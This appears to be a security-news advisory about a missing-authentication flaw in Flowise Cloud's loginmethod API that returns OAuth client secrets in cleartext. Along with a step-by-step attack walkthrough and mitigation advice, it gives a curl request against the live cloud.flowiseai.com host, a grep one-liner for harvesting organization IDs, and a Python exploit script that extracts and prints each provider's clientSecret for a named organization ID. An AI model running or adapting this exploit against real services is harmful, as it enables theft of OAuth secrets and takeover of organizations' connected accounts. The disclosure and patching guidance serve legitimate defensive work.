Listen to this Post
The vulnerability resides in the `/api/v1/loginmethod` endpoint. The API is designed to manage SSO configurations for organizations. However, it suffers from a critical Missing Authentication flaw, as the GET method on this endpoint does not require any form of authentication or authorization. The mechanism of the attack is as follows:
1. Target Identification: An attacker first identifies a target `organizationId` (e.g., bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d). These IDs might be exposed elsewhere in the application or can be enumerated through other means.
2. Unauthenticated Request: The attacker then crafts a simple HTTP GET request to the vulnerable endpoint. The request contains no cookies, no authorization headers, and no tokens. It is sent by anyone on the internet with the sole parameter being the target organizationId.
3. Server-Side Failure: On the server side, there is a critical failure. The endpoint does not check the identity of the caller before processing the request. It fails to verify if the request comes from an authenticated user or a guest.
4. Data Exposure: The server processes the request as valid and, without any checks, queries its database for the SSO configuration belonging to the provided organizationId.
5. Sensitive Response: The server returns a `200 OK` response containing the full SSO configuration. This includes not just configuration metadata, but the actual OAuth `clientSecret` (and clientID) for all configured providers (Google, Microsoft, GitHub, etc.) in cleartext. No encryption or redaction is applied to these secrets before they are sent back to the unauthenticated caller.
6. Harvesting Secrets: The attacker receives this response and now possesses the valid, active OAuth secrets for the victim organization. These can be used to interact with the organization’s third-party services.
7. Complete Compromise: With these secrets, the attacker can perform actions on behalf of the organization on the linked third-party platforms, leading to data breaches, lateral movement, or complete account takeovers.
DailyCVE Form:
Platform: Flowise Cloud
Version: Unspecified
Vulnerability: Missing Authentication
Severity: Critical
date: Not Specified
Prediction: Patch Unknown
What Undercode Say:
Analytics:
Identify organization IDs via API response leakage grep -oP '"organizationId":"[a-f0-9-]+"' response.json | sort -u Attempt to retrieve SSO config without authentication curl -X GET "https://cloud.flowiseai.com/api/v1/loginmethod?organizationId=victim-org-id" -v
Exploit:
import requests
target_url = "https://cloud.flowiseai.com/api/v1/loginmethod"
victim_org_id = "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d"
No authentication headers are required
payload = {"organizationId": victim_org_id}
response = requests.get(target_url, params=payload)
if response.status_code == 200:
sso_config = response.json()
Extract and use the exposed client secrets
for provider in sso_config.get("providers", []):
print(f"[+] Exposed secrets for {provider['name']}: {provider['config'].get('clientSecret')}")
else:
print("[-] Exploit failed.")
Protection from this CVE:
Immediate Mitigation: Implement strict authentication and authorization checks on the `/api/v1/loginmethod` endpoint. It must verify that the requesting user is authenticated and has the proper role (e.g., admin) to view the target organization’s configuration.
Long-term Fix: Apply a vendor-supplied patch as soon as it becomes available. Never trust user-supplied identifiers without validating the user’s ownership of the resource.
Secrets Rotation: As a precaution, assume all OAuth secrets may have been compromised and rotate them immediately.
Impact:
An unauthenticated attacker can harvest sensitive OAuth secrets (Client Secrets) from any organization on the cloud platform. This leads to the complete compromise of the organization’s third-party integrations (Google, Microsoft, GitHub, etc.), potentially allowing the attacker to hijack authentication flows, steal credentials, and access sensitive data across multiple connected services.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

